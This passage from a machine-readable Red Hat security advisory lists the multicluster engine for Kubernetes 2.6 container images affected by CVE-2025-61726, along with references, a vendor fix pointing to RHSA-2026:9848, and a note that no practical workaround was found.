2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2025-61726"}, {"category": "external", "summary": "RHBZ#2434432", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726", "url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"}, {"category": "external", "summary": "https://go.dev/cl/736712", "url": "https://go.dev/cl/736712"}, {"category": "external", "summary": "https://go.dev/issue/77101", "url": "https://go.dev/issue/77101"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc", "url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4341", "url": "https://pkg.go.dev/vuln/GO-2026-4341"}], "release_date": "2026-01-28T19:30:31.215000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T17:54:30+00:00", "details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.11/html/clusters/cluster_mce_overview#mce-install-intro", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9848"}, {"category": "workaround", "details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 